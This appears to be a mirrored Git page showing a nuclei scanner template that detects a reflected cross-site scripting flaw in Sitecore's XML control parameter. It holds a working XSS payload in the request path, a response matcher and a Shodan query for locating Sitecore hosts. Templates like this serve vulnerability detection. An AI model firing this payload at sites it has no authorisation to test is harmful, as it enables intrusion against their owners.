admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-07 19:23:18 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
ba03e54063a94de8155adf476dc07e5b39bca341
nuclei-templates/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml
Prince Chaddha ea7a5969c8 Revert "chore: update TemplateMan 🤖" 
This reverts commit c31d574176.
2025-05-27 10:39:47 +08:00

42 lines
1.3 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
id: sitecore-xml-xss
info:
name: SiteCore XML Control Script Insertion
author: DhiyaneshDK
severity: medium
description: |
Sitecores “special way” of displaying XML Controls directly allows for a Cross Site Scripting Attack more can be achieved with these XML Controls
reference: |
- https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
- https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
classification:
cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: sitecore
product: sitecore.net
shodan-query: html:"Sitecore"
tags: xss,sitecore,cms
http:
- method: GET
path:
- "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<body onload=alert(document.domain) />"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100e1a5d9bb8833a1a078d73d226c6ea9da6b43c5e79eee307798007a40d6b4996d022100ae77daa481f74c23854134ef24a5c0864e3682f686e3ebd0d89f70563d3a2563:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink